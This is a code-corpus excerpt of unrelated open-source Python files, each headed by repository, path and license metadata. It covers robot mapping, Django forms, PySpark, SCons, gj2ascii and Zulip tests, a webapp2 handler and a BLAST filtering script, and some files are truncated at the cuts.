odom_l, odom_r = new_ltrack_pos - ltrack_pos, new_rtrack_pos - rtrack_pos
marker_map = np.array([[150,0,0],[91,110,pi/2],[0,41,pi],[0,0,0]])
frame = eliminate_grip(frame)
BB_legos2=get_lego_boxes(frame)
BB_legos=[]
for bbox in BB_legos2:
if bbox[3]<460 and (bbox[2]<380 or bbox[2]>420):
BB_legos.append(bbox)
image_name="
|
lego_boxes"
for bbox in BB_legos:
image_complete_name="{}_{}{}".format(image_name,iteration,".png")
iteration+=1
        input_frame=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:]
cv2.imwrite(image_complete_name,input_frame)
#frame = plot_bbox(frame, bbox)
lego_landmarks = mapping.cam2rob(BB_legos,H)
mtx,dist=load_camera_params()
frame,marker_list=get_marker_pose(frame,mtx,dist,marker_list=[0,1,2,3],markerLength=8.6)
print("####################################################################################")
estim_rob_pos_odom = odom_estimation(odom_r,odom_l,robot.position)
index = 1000
mapa, delete_countdown,robot_trajectory, links = mapping.update_mapa2(mapa,lego_landmarks,estim_rob_pos_odom,P,delete_countdown, robot_trajectory, index)
Ts = 0.3
estim_rob_pos, P = kalman_filter2(odom_r,odom_l,robot.position,marker_list, marker_map,Ts,P)
robot.position = estim_rob_pos
mapa = mapping.after_kalman_improvement(mapa, robot.position, estim_rob_pos_odom)
d = np.ones(3)
d[0] = estim_rob_pos[0] + 28 *np.cos(estim_rob_pos[2] * pi/180)
d[1] = estim_rob_pos[1] + 28* np.sin(estim_rob_pos[2]*pi/180)
d[2] = estim_rob_pos[2]
R.append(d)
box_print = [x + [0] for x in marker_map.tolist()]
map_renderer.plot_bricks_and_trajectory_and_robot_and_boxes(mapa, R, d, box_print)
############################################
print("odom :", estim_rob_pos_odom, "kalmancito" , estim_rob_pos )
#Feature extraction from bounding boxes
image_name2="lego_boxes_no_duplicates"
bboxes = []
for i in range(0,len(links)):
bbox = BB_legos[links[i][0]]
bboxes.append(frame[bbox[1]:bbox[3], bbox[0]:bbox[2],:])
image_complete_name2="{}_{}{}".format(image_name2,iteration2,".png")
iteration2+=1
input_frame2=frame[bbox[1]:bbox[3],bbox[0]:bbox[2],:]
cv2.imwrite(image_complete_name2,input_frame2)
bounding_box_features = similarity_detector.extract_features(bboxes)
for i in range(0,len(links)):
feature_map[links[i][1]] = bounding_box_features[i]
print("SHAPE: ", len(feature_map))
#print("FEAT" , feature_map)
#DEFINE MOTION CONTROL FOR SEARCHING
# THE CONTROL IS : 1. GO TO THE CENTER OF THE WORKSPACE, 2. ROUND FOR 2 secs , SELECT A POINT CLOSE TO THE CENTER as new target
vel_wheels = naive_obstacle_avoidance_control(mapa, robot.position)
iteration+=1
if time.time()-t > 30:
clust_feats=[]
for item in feature_map:
if not np.all(item==0):
clust_feats.append(item)
clustering_alg.fit
|
DmitryFillo/rknfilter
|
rknfilter/targets/store.py
|
Python
|
bsd-2-clause
| 1,324
| 0.002266
|
from rknfilter.targets import BaseTarget
from rknfilter.db import Resource, Decision, CommitEvery
from rknfilter.core import DumpFilesParser
class StoreTarget(BaseTarget):
def __init__(self, *args, **kwargs):
super(StoreTarget, self).__init__(*args, **kwargs)
self._dump_files_parser = DumpFilesParser()
def process(self):
commit = CommitEvery(self._session)
for content, decision, domains, urls, ips, _ in self._dump_files_parser.get_data():
# TODO: move to models?
resource = Resource.get_or_create(self._session, rkn_id=content['rkn_id'])
if resource.id is None:
resource.include_date = content['include_date']
resource.entry_type = content['entry_type']
resource.urgency_type = content['urgency_type']
resource.block_type = content['block_type']
resource.decision = Decision(
date=decision['decision_date'],
                org=decision['decision_org'],
num=decision['decision_num']
)
            resource.sync_m2m_proxy('domains_list', domains)
resource.sync_m2m_proxy('urls_list', urls)
resource.sync_m2m_proxy('ips_list', ips)
commit()
commit(force=True)
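# CommitEvery is used above as a callable that batches session commits; a
# plausible minimal implementation under that assumption (the real class lives
# in rknfilter.db and may differ):
class _CommitEverySketch(object):
    def __init__(self, session, every=1000):
        self._session = session
        self._every = every
        self._count = 0
    def __call__(self, force=False):
        self._count += 1
        if force or self._count % self._every == 0:
            self._session.commit()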
|
praekelt/mc2
|
mc2/forms.py
|
Python
|
bsd-2-clause
| 1,161
| 0
|
from django import forms
from django.contrib.auth.models import User as user_model
from django.contrib.auth.forms import UserCreationForm
from mc2.models import UserSettings
class UserSettingsForm(forms.ModelForm):
settings_level = forms.ChoiceField(
choices=UserSettings.SETTINGS_LEVEL_CHOICES,
widget=forms.RadioSelect())
class Meta:
model = UserSettings
fields = ('settings_level', )
class CreateAccountForm(UserCreationForm):
"""
Form for creating a new user account.
"""
|
first_name = forms.CharField(required=False)
last_name = forms.CharField(required=False)
email = forms.EmailField(required=True)
def clean_email(self):
'''
Validate that the supplied email address is unique for the
        site.
'''
if user_model.objects.filter(
email__iexact=self.cleaned_data['email']).exists():
raise forms.ValidationError('This email address is already in use.'
' Please supply a different'
' email address.')
return self.cleaned_data['email']
|
wangmiao1981/spark
|
python/pyspark/sql/pandas/map_ops.py
|
Python
|
apache-2.0
| 3,806
| 0.002365
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
from pyspark.rdd import PythonEvalType
class PandasMapOpsMixin(object):
"""
    Mix-in for pandas map operations. Currently, only :class:`DataFrame`
can use this class.
"""
def mapInPandas(self, func, schema):
"""
Maps an iterator of batches in the current :class:`DataFrame` using a Python native
function that takes and outputs a pandas DataFrame, and returns the result as a
:class:`DataFrame`.
The function should take an iterator of `pandas.DataFrame`\\s and return
another iterator of `pandas.DataFrame`\\s. All columns are passed
together as an iterator of `pandas.DataFrame`\\s to the function and the
        returned iterator of `pandas.DataFrame`\\s is combined as a :class:`DataFrame`.
Each `pandas.DataFrame` size can be controlled by
`spark.sql.execution.arrow.maxRecordsPerBatch`.
.. versionadded:: 3.0.0
Parameters
----------
func : function
a Python native function that takes an iterator of `pandas.DataFrame`\\s, and
outputs an iterator of `pandas.DataFrame`\\s.
schema : :class:`pyspark.sql.types.DataType` or str
the return type of the `func` in PySpark. The value can be either a
:class:`pyspark.sql.types.DataType` object or a DDL-formatted type string.
Examples
--------
>>> from pyspark.sql.functions import pandas_udf
>>> df = spark.createDataFrame([(1, 21), (2, 30)], ("id", "age"))
>>> def filter_func(iterator):
... for pdf in iterator:
... yield pdf[pdf.id == 1]
>>> df.mapInPandas(filter_func, df.schema).show() # doctest: +SKIP
+---+---+
| id|age|
+---+---+
| 1| 21|
+---+---+
Notes
-----
This API is experimental
See Also
--------
pyspark.sql.functions.pandas_udf
"""
from pyspark.sql import DataFrame
from pyspark.sql.pandas.functions import pandas_udf
assert isinstance(self, DataFrame)
udf = pandas_udf(
            func, returnType=schema, functionType=PythonEvalType.SQL_MAP_PANDAS_ITER_UDF)
udf_column = udf(*[self[col] for col in self.columns])
jdf = self._jdf.mapInPandas(udf_column._jc.expr())
return DataFrame(jdf, self.sql_ctx)
def _test():
import doctest
from pyspark.sql import SparkSession
import pyspark.sql.pandas.map_ops
globs = pyspark.sql.pandas.map_ops.__dict__.copy()
spark = SparkSession.builder\
.master("local[4]")\
.appName("sql.pandas.map_ops tests")\
.getOrCreate()
globs['spark'] = spark
(failure_count, test_count) = doctest.testmod(
pyspark.sql.pandas.map_ops, globs=globs,
optionflags=doctest.ELLIPSIS | doctest.NORMALIZE_WHITESPACE | doctest.REPORT_NDIFF)
spark.stop()
if failure_count:
sys.exit(-1)
if __name__ == "__main__":
_test()
|
makinacorpus/mapnik2
|
scons/scons-local-1.2.0/SCons/Tool/g++.py
|
Python
|
lgpl-2.1
| 3,111
| 0.0045
|
"""SCons.Tool.g++
Tool-specific initialization for g++.
There normally shouldn't be any need to import this module directly.
It will usually be imported through the generic SCons.Tool.Tool()
selection method.
"""
#
# Copyright (c) 2001, 2002, 2003, 2004, 2005, 2006, 2007, 2008 The SCons Foundation
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "src/engine/SCons/Tool/g++.py 3842 2008/12/20 22:59:52 scons"
import os.path
import re
import subprocess
import SCons.Tool
import SCons.Util
cplusplus = __import__('c++', globals(), locals(), [])
compilers = ['g++']
def generate(env):
"""Add Builders and construction variables for g++ to an Environment."""
static_obj, shared_obj = SCons.Tool.createObjBuilders(env)
    cplusplus.generate(env)
env['CXX'] = env.Detect(compilers)
# platform specific settings
if env['PLATFORM'] == 'aix':
        env['SHCXXFLAGS'] = SCons.Util.CLVar('$CXXFLAGS -mminimal-toc')
env['STATIC_AND_SHARED_OBJECTS_ARE_THE_SAME'] = 1
env['SHOBJSUFFIX'] = '$OBJSUFFIX'
elif env['PLATFORM'] == 'hpux':
env['SHOBJSUFFIX'] = '.pic.o'
elif env['PLATFORM'] == 'sunos':
env['SHOBJSUFFIX'] = '.pic.o'
# determine compiler version
if env['CXX']:
#pipe = SCons.Action._subproc(env, [env['CXX'], '-dumpversion'],
pipe = SCons.Action._subproc(env, [env['CXX'], '--version'],
stdin = 'devnull',
stderr = 'devnull',
stdout = subprocess.PIPE)
if pipe.wait() != 0: return
# -dumpversion was added in GCC 3.0. As long as we're supporting
# GCC versions older than that, we should use --version and a
# regular expression.
#line = pipe.stdout.read().strip()
#if line:
# env['CXXVERSION'] = line
line = pipe.stdout.readline()
match = re.search(r'[0-9]+(\.[0-9]+)+', line)
if match:
env['CXXVERSION'] = match.group(0)
def exists(env):
return env.Detect(compilers)
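# Standalone sketch (not part of the tool): how the regex above pulls the
# version out of a --version banner; the banner string is hypothetical.
def _parse_gxx_version(banner):
    match = re.search(r'[0-9]+(\.[0-9]+)+', banner)
    return match.group(0) if match else None
# _parse_gxx_version('g++ (GCC) 9.4.0') -> '9.4.0'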
|
geowurster/gj2ascii
|
tests/test_cli.py
|
Python
|
bsd-3-clause
| 13,853
| 0.000361
|
"""
Unittests for gj2ascii CLI
"""
from __future__ import division
import os
import tempfile
import unittest
import click
import emoji
import fiona as fio
import pytest
import gj2ascii
from gj2ascii import cli
def test_complex(runner, expected_line_40_wide, line_file, compare_ascii):
result = runner.invoke(cli.main, [
line_file,
'--width', '40',
'--char', '+',
'--fill', '.',
'--no-prompt',
'--all-touched',
'--iterate',
'--crs', 'EPSG:26918'
])
assert result.exit_code == 0
assert compare_ascii(result.output, expected_line_40_wide)
def test_bad_fill_value(runner, poly_file):
result = runner.invoke(cli.main, ['-c toolong', poly_file])
assert result.exit_code != 0
assert result.output.startswith('Usage:')
assert 'Error:' in result.output
assert 'must be a single character' in result.output
def test_bad_rasterize_value(runner, poly_file):
result = runner.invoke(cli.main, ['-f toolong', poly_file])
assert result.exit_code != 0
assert result.output.startswith('Usage:')
assert 'Error:' in result.output
assert 'must be a single character' in result.output
def test_render_one_layer_too_many_args(runner, poly_file):
result = runner.invoke(cli.main, [
poly_file,
'--char', '-',
'--char', '8'
])
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'number' in result.output
assert '--char' in result.output
def test_different_width(runner, poly_file):
fill = '+'
value = '.'
width = 62
result = runner.invoke(cli.main, [
'--width', width,
poly_file,
'--fill', fill,
'--char', value,
'--no-prompt'
])
assert result.exit_code == 0
for line in result.output.rstrip(os.linesep).splitlines():
if line.startswith((fill, value)):
assert len(line.rstrip(os.linesep).split()) == width / 2
def test_iterate_wrong_arg_count(runner, poly_file):
result = runner.invoke(cli.main, [
poly_file,
'--iterate',
'--char', '1',
'--char', '2'
])
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'arg' in result.output
assert 'layer' in result.output
def test_bbox(runner, poly_file, small_aoi_poly_line_file, compare_ascii):
expected = os.linesep.join([
' + + + +',
' + + +',
' + +',
' +',
'+ +',
'+ + +',
'+ + +',
'+ +',
'+ + +',
' + +',
' + + +',
' + + + +',
' + + + + +',
' + + + + + +',
' + + + + + + +',
''
])
with fio.open(small_aoi_poly_line_file) as src:
cmd = [
poly_file,
'--width', '40',
'--char', '+',
'--bbox',
] + list(map(str, src.bounds))
result = runner.invoke(cli.main, cmd)
assert result.exit_code == 0
assert compare_ascii(result.output.strip(), expected.strip())
def test_exceed_auto_generate_colormap_limit(runner, poly_file):
infiles = [poly_file for i in range(len(gj2ascii.ANSI_COLORMAP.keys()) + 2)]
result = runner.invoke(cli.main, infiles)
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'auto' in result.output
assert 'generate' in result.output
assert '--char' in result.output
def test_default_char_map(runner, poly_file, compare_ascii):
with fio.open(poly_file) as src:
expected = gj2ascii.render(src)
result = runner.invoke(cli.main, [
poly_file
])
assert result.exit_code == 0
assert compare_ascii(result.output.strip(), expected.strip())
def test_same_char_twice(runner, poly_file, line_file, compare_ascii):
width = 40
fill = '.'
char = '+'
with fio.open(poly_file) as poly, fio.open(line_file) as line:
coords = list(poly.bounds) + list(line.bounds)
bbox = (min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4]))
expected = gj2ascii.render_multiple(
[(poly, char), (line, char)], width=width, fill=fill, bbox=bbox)
result = runner.invoke(cli.main, [
poly_file, line_file,
'--width', width,
'--char', char,
'--char', char,
'--fill', fill
])
assert result.exit_code == 0
assert compare_ascii(expected, result.output)
def test_iterate_bad_property(runner, single_feature_wv_file):
result = runner.invoke(cli.main, [
single_feature_wv_file,
'--iterate',
'--properties', 'bad-prop'
])
assert result.exit_code != 0
assert isinstance(result.exception, KeyError)
def test_styled_write_to_file(runner, single_feature_wv_file, compare_ascii):
with fio.open(single_feature_wv_file) as src:
expected = gj2ascii.render(src, width=20, char='1', fill='0')
with tempfile.NamedTemporaryFile('r+') as f:
result = runner.invoke(cli.main, [
single_feature_wv_file,
'--width', '20',
'--properties', 'NAME,ALAND',
'--char', '1=red',
'--fill', '0=blue',
'--outfile', f.name
])
f.seek(0)
assert result.exit_code == 0
assert result.output == ''
assert compare_ascii(f.read().strip(), expected.strip())
def test_stack_too_many_args(runner, multilayer_file):
result = runner.invoke(cli.main, [
        multilayer_file + ',polygons,lines',
'--char', '+',
'--char', '8',
'--char', '0' # 2 layers but 3 values
])
assert result.exit_code != 0
    assert result.output.startswith('Error:')
assert '--char' in result.output
assert 'number' in result.output
assert 'equal' in result.output
def test_iterate_too_many_layers(runner, multilayer_file):
result = runner.invoke(cli.main, [
multilayer_file,
'--iterate', '--no-prompt'
])
assert result.exit_code != 0
assert result.output.startswith('Error:')
assert 'single layer' in result.output
def test_multilayer_compute_colormap(runner, multilayer_file, compare_ascii):
coords = []
for layer in ('polygons', 'lines'):
with fio.open(multilayer_file, layer=layer) as src:
coords += list(src.bounds)
bbox = min(coords[0::4]), min(coords[1::4]), max(coords[2::4]), max(coords[3::4])
rendered_layers = []
for layer, char in zip(('polygons', 'lines'), ('0', '1')):
with fio.open(multilayer_file, layer=layer) as src:
rendered_layers.append(
gj2ascii.render(src, width=20, fill=' ', char=char, bbox=bbox))
expected = gj2ascii.stack(rendered_layers)
# Explicitly define since layers are not consistently listed in order
result = runner.invoke(cli.main, [
multilayer_file + ',polygons,lines',
'--width', '20'
])
assert result.exit_code == 0
assert compare_ascii(expected.strip(), result.output.strip())
def test_stack_layers(runner, multilayer_file, compare_ascii):
expected = os.linesep.join([
'. + . . . . . . . . . . . + . . . . . .',
'. + + + . . . . . . . . . . . . . . . .',
'. . 8 8 8 8 8 8 8 . . . . 8 . . . . . .',
'. . . 8 . . . . . . . . . 8 . . . . . .',
'. . . . 8 . . . . + . . . . 8 . . . . .',
'. . . . . 8 . . . + + . . . 8 . . . . .',
'. . . . . . 8 . . + + + + . 8 . . . . .',
'. . . . . 8 . . . . + + + + . 8 . . . .',
'. . . . 8 . . . . . . 8 8 8 . 8 . . + .',
'+ + + . 8 . . . 8 8 8 . + + . . 8 + + +',
'+ + + 8 . . . . . . . . . . . . 8 + + +',
'. . 8 . . . 8 . . + . . . . . . 8 + + .',
'. . . 8 . . 8 8 + + . . . . . . . 8 + .',
'. . . . 8 . 8 + 8 + . . . . . . . 8 + .',
|
daj0ker/BinPy
|
BinPy/tests/tree_tests.py
|
Python
|
bsd-3-clause
| 2,286
| 0.000875
|
from __future__ import print_function
from BinPy.connectors.connector import *
from BinPy.gates.tree import *
from BinPy.connectors.connector import *
from BinPy.gates.gates import *
from BinPy.combinational.combinational import *
from nose.tools import with_setup, nottest
'''
Testing backtrack() function for depths from 0 to 4.
'''
def get_tree_for_depth_checking(depth):
# Gates for depth test
g1 = AND(True, False)
g2 = AND(True, False)
g3 = AND(g1, g2)
g4 = AND(True, False)
g5 = AND(True, False)
g6 = AND(g4, g5)
g_final = AND(g3, g6)
# Instance of Tree
tree_inst = Tree(g_final, depth)
tree_inst.backtrack()
# Testing tree
n1 = (g1, [True, False])
n2 = (g2, [True, False])
n4 = (g4, [True, False])
n5 = (g5, [True, False])
n3 = (g3, [n1, n2])
n6 = (g6, [n4, n5])
tree_testing = (g_final, [n3, n6])
return tree_inst, tree_testing
def compare_trees(tree_inst, tree_testing, depth):
if isinstance(tree_testing, tuple):
if not tree_testing[0] == tree_inst.element:
assert False
if depth == 0:
if len(tree_inst.sons) != 0:
assert False
else:
for i in range(len(tree_testing[1])):
compare_trees(tree_inst.sons[i], tree_testing[1][i], depth - 1)
else:
        if not tree_testing == tree_inst.element:
            assert False
def backtrack_depth_test():
for i in range(6):
        tree_inst, tree_testing = get_tree_for_depth_checking(i)
compare_trees(tree_inst, tree_testing, i)
'''
Test to see if the set_depth method works
'''
def set_depth_test():
tree_inst, tree_testing = get_tree_for_depth_checking(0)
for i in range(1, 6):
tree_inst.set_depth(i)
tree_inst.backtrack()
compare_trees(tree_inst, tree_testing, i)
'''
Test not following Cycles functionality
'''
def not_following_cycles_test():
c1 = Connector(True)
g1 = AND(c1, True)
g2 = AND(g1, False)
g2.set_output(c1)
t_no_cycle = Tree(g2, 5, False)
t_cycle = Tree(g2, 5, True)
t_no_cycle.backtrack()
t_cycle.backtrack()
assert t_no_cycle.sons[0].sons[0].sons[0].sons == []
assert t_cycle.sons[0].sons[0].sons[0].sons[0].element == g1
|
rht/zulip
|
zerver/webhooks/helloworld/tests.py
|
Python
|
apache-2.0
| 3,346
| 0.002092
|
from django.conf import settings
from zerver.lib.test_classes import WebhookTestCase
from zerver.models import get_realm, get_system_bot
class HelloWorldHookTests(WebhookTestCase):
STREAM_NAME = "test"
    URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}&stream={stream}"
PM_URL_TEMPLATE = "/api/v1/external/helloworld?&api_key={api_key}"
WEBHOOK_DIR_NAME = "helloworld"
    # Note: Include a test function per each distinct message condition your integration supports
def test_hello_message(self) -> None:
expected_topic = "Hello World"
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Marilyn Monroe](https://en.wikipedia.org/wiki/Marilyn_Monroe)**"
# use fixture named helloworld_hello
self.check_webhook(
"hello",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_goodbye_message(self) -> None:
expected_topic = "Hello World"
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**"
# use fixture named helloworld_goodbye
self.check_webhook(
"goodbye",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_pm_to_bot_owner(self) -> None:
# Note that this is really just a test for check_send_webhook_message
self.URL_TEMPLATE = self.PM_URL_TEMPLATE
self.url = self.build_webhook_url()
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**"
self.send_and_test_private_message(
"goodbye",
expected_message=expected_message,
content_type="application/x-www-form-urlencoded",
)
def test_stream_error_pm_to_bot_owner(self) -> None:
# Note that this is really just a test for check_send_webhook_message
self.STREAM_NAME = "nonexistent"
self.url = self.build_webhook_url()
realm = get_realm("zulip")
notification_bot = get_system_bot(settings.NOTIFICATION_BOT, realm.id)
expected_message = "Your bot `webhook-bot@zulip.com` tried to send a message to stream #**nonexistent**, but that stream does not exist. Click [here](#streams/new) to create it."
self.send_and_test_private_message(
"goodbye",
expected_message=expected_message,
content_type="application/x-www-form-urlencoded",
sender=notification_bot,
)
def test_custom_topic(self) -> None:
# Note that this is really just a test for check_send_webhook_message
expected_topic = "Custom Topic"
self.url = self.build_webhook_url(topic=expected_topic)
expected_message = "Hello! I am happy to be here! :smile:\nThe Wikipedia featured article for today is **[Goodbye](https://en.wikipedia.org/wiki/Goodbye)**"
self.check_webhook(
"goodbye",
expected_topic,
expected_message,
content_type="application/x-www-form-urlencoded",
)
|
krismcfarlin/todo_angular_endpoints_sockets
|
bp_content/themes/default/handlers/handlers.py
|
Python
|
lgpl-3.0
| 10,823
| 0.00462
|
# -*- coding: utf-8 -*-
"""
A real simple app for using webapp2 with auth and session.
It just covers the basics. Creating a user, login, logout
and a decorator for protecting certain handlers.
Routes are setup in routes.py and added in main.py
"""
# standard library imports
import logging
# related third party imports
import webapp2
from google.appengine.ext import ndb
from google.appengine.api import taskqueue
from webapp2_extras.auth import InvalidAuthIdError, InvalidPasswordError
from webapp2_extras.i18n import gettext as _
from bp_includes.external import httpagentparser
# local application/library specific imports
import bp_includes.lib.i18n as i18n
from bp_includes.lib.basehandler import BaseHandler
from bp_includes.lib.decorators import user_required
from bp_includes.lib import captcha, utils
import bp_includes.models as models_boilerplate
import forms as forms
from google.appengine.api import memcache
from google.appengine.api import channel
import random
import logging
logger = logging.getLogger(__name__)
class ContactHandler(BaseHandler):
"""
Handler for Contact Form
"""
def get(self):
""" Returns a simple HTML for contact form """
if self.user:
user_info = self.user_model.get_by_id(long(self.user_id))
if user_info.name or user_info.last_name:
self.form.name.data = user_info.name + " " + user_info.last_name
if user_info.email:
self.form.email.data = user_info.email
params = {
"exception": self.request.get('exception')
}
return self.render_template('contact.html', **params)
def post(self):
""" validate contact form """
if not self.form.validate():
return self.get()
remote_ip = self.request.remote_addr
city = i18n.get_city_code(self.request)
region = i18n.get_region_code(self.request)
country = i18n.get_country_code(self.request)
coordinates = i18n.get_city_lat_long(self.request)
user_agent = self.request.user_agent
exception = self.request.POST.get('exception')
name = self.form.name.data.strip()
email = self.form.email.data.lower()
message = self.form.message.data.strip()
template_val = {}
try:
# parsing user_agent and getting which os key to use
# windows uses 'os' while other os use 'flavor'
ua = httpagentparser.detect(user_agent)
_os = ua.has_key('flavor') and 'flavor' or 'os'
operating_system = str(ua[_os]['name']) if "name" in ua[_os] else "-"
if 'version' in ua[_os]:
operating_system += ' ' + str(ua[_os]['version'])
if 'dist' in ua:
operating_system += ' ' + str(ua['dist'])
browser = str(ua['browser']['name']) if 'browser' in ua else "-"
browser_version = str(ua['browser']['version']) if 'browser' in ua else "-"
template_val = {
"name": name,
"email": email,
"ip": remote_ip,
"city": city,
"region": region,
"country": country,
"coordinates": coordinates,
"browser": browser,
"browser_version": browser_version,
"operating_system": operating_system,
"message": message
}
except Exception as e:
logging.error("error getting user agent info: %s" % e)
try:
subject = _("Contact") + " " + self.app.config.get('app_name')
# exceptions for error pages that redirect to contact
if exception != "":
subject = "{} (Exception error: {})".format(subject, exception)
body_path = "emails/contact.txt"
body = self.jinja2.render_template(body_path, **template_val)
email_url = self.uri_for('taskqueue-send-email')
taskqueue.add(url=email_url, params={
'to': self.app.config.get('contact_recipient'),
'subject': subject,
'body': body,
'sender': self.app.config.get('contact_sender'),
})
message = _('Your message was sent successfully.')
self.add_message(message, 'success')
return self.redirect_to('contact')
except (AttributeError, KeyError), e:
logging.error('Error sending contact form: %s' % e)
message = _('Error sending the message. Please try again later.')
self.add_message(message, 'error')
return self.redirect_to('contact')
@webapp2.cached_property
def form(self):
return forms.ContactForm(self)
class SecureRequestHandler(BaseHandler):
"""
Only accessible to users that are logged in
"""
@user_required
def get(self, **kwargs):
user_session = self.user
user_session_object = self.auth.store.get_session(self.request)
user_info = self.user_model.get_by_id(long(self.user_id))
user_info_object = self.auth.store.user_model.get_by_auth_token(
user_session['user_id'], user_session['token'])
try:
params = {
"user_session": user_session,
"user_session_object": user_session_object,
"user_info": user_info,
"user_info_object": user_info_object,
"userinfo_logout-url": self.auth_config['logout_url'],
}
return self.render_template('secure_zone.html', **params)
except (AttributeError, KeyError), e:
return "Secure zone error:" + " %s." % e
class DeleteAccountHandler(BaseHandler):
@user_required
def get(self, **kwargs):
chtml = captcha.displayhtml(
public_key=self.app.config.get('captcha_public_key'),
use_ssl=(self.request.scheme == 'https'),
error=None)
if self.app.config.get('captcha_public_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE" or \
self.app.config.get('captcha_private_key') == "PUT_YOUR_RECAPCHA_PUBLIC_KEY_HERE":
chtml = '<div class="alert alert-error"><strong>Error</strong>: You have to ' \
'<a href="http://www.google.com/recaptcha/whyrecaptcha" target="_blank">sign up ' \
'for API keys</a> in order to use reCAPTCHA.</div>' \
'<input type="hidden" name="recaptcha_challenge_field" value="manual_challenge" />' \
'<input type="hidden" name="recaptcha_response_field" value="manual_challenge" />'
params = {
'captchahtml': chtml,
}
return self.render_template('delete_account.html', **params)
def post(self, **kwargs):
challenge = self.request.POST.get('recaptcha_challenge_field')
response = self.request.POST.get('recaptcha_response_field')
remote_ip = self.request.remote_addr
cResponse = captcha.submit(
challenge,
response,
self.app.config.get('captcha_private_key'),
remote_ip)
if cResponse.is_valid:
# captcha was valid... carry on..nothing to see here
pass
else:
_message = _('Wrong image verification code. Please try again.')
self.add_message(_message, 'error')
return self.redirect_to('delete-account')
if not self.form.validate() and False:
return self.get()
password = self.form.password.data.strip()
try:
user_info = self.user_model.get_by_id(long(self.user_id))
auth_id = "own:%s" % user_info.username
password = utils.hashing(password, self.app.config.get('salt'))
try:
# authenticate user by its password
user = self.user_model.get_by_auth_password(auth_id, password)
if user:
# Delete Social Login
for social in models_boilerplate.SocialUser.get_by_user(user_info.key)
|
reamdc1/gene_block_evolution_old
|
loci_filtering.py
|
Python
|
gpl-3.0
| 8,117
| 0.014291
|
#!/usr/bin/python
from multiprocessing import Pool
import time
import os
import sys
import argparse
from homolog4 import *
from collections import defaultdict
# Copyright(C) 2014 David Ream
# Released under Biopython license. http://www.biopython.org/DIST/LICENSE
# Do not remove this comment
# This exists to make the main function easier to read. It contains code to run the argument parser, and does nothing else.
def parser_code():
parser = argparse.ArgumentParser(description="Filter out redundant hits, by loci, from the initial BLAST parse and remove organisms that lack neighborhoods.")
parser.add_argument("-i", "--infolder", dest="infolder", default='./blast_parse_raw_operon/', metavar="FOLDER",
help="A folder that contains the initial parse of the BLAST hits. This program assumes that no loci filtering or organism removal has been done yet.")
parser.add_argument("-o", "--outfolder", dest="outfolder", metavar="FOLDER", default='./blast_parse/',
help="Folder where the BLAST results will be stored. Default is the folder './blast_result/'.")
parser.add_argument("-q", "--operon_query", dest="operon_query", default='./regulonDB/operon_names_and_genes.txt', metavar="FILE",
help="A file that contains the names and genes comprising the operons that are under investigation.")
parser.add_argument("-r", "--reference", dest="reference", default='NC_000913', metavar="STRING",
help="An accession number of the reference organism.")
parser.add_argument("-f", "--filter", dest="filter", default='', metavar="FILE",
help="A file that contains the accession numbers of the organisms that are under investigation.")
parser.add_argument("-n", "--num_proc", dest="num_proc", metavar="INT", default = os.sysconf("SC_NPROCESSORS_CONF"), type=int,
help="Number of processors that you want this script to run on. The default is every CPU that the system has.")
parser.add_argument("-g", "--max_gap", dest="max_intergenic_gap", metavar="INT", default = 500, type=int,
help="Length of the largest allowable intergenic gap allowed in determining a gene neighborhood. Default is 500 nucleotides")
return parser.parse_args()
def check_options(parsed_args):
if os.path.isdir(parsed_args.infolder):
infolder = parsed_args.infolder
else:
print "The folder %s does not exist." % parsed_args.infolder
sys.exit()
# if the directory that the user specifies does not exist, then the program makes it for them.
if not os.path.isdir(parsed_args.outfolder):
os.makedirs(parsed_args.outfolder)
outfolder = parsed_args.outfolder
if outfolder[-1] != '/':
outfolder = outfolder + '/'
if os.path.exists(parsed_args.operon_query):
operon_query = parsed_args.operon_query
else:
print "The file %s does not exist." % parsed_args.operon_query
sys.exit()
if os.path.exists(parsed_args.filter):
filter_file = parsed_args.filter
elif parsed_args.filter == '':
filter_file = parsed_args.filter
else:
print "The file %s does not exist." % parsed_args.filter
sys.exit()
# section of code that deals determining the number of CPU cores that will be used by the program
if parsed_args.num_proc > os.sysconf("SC_NPROCESSORS_CONF"):
num_proc = os.sysconf("SC_NPROCESSORS_CONF")
elif parsed_args.num_proc < 1:
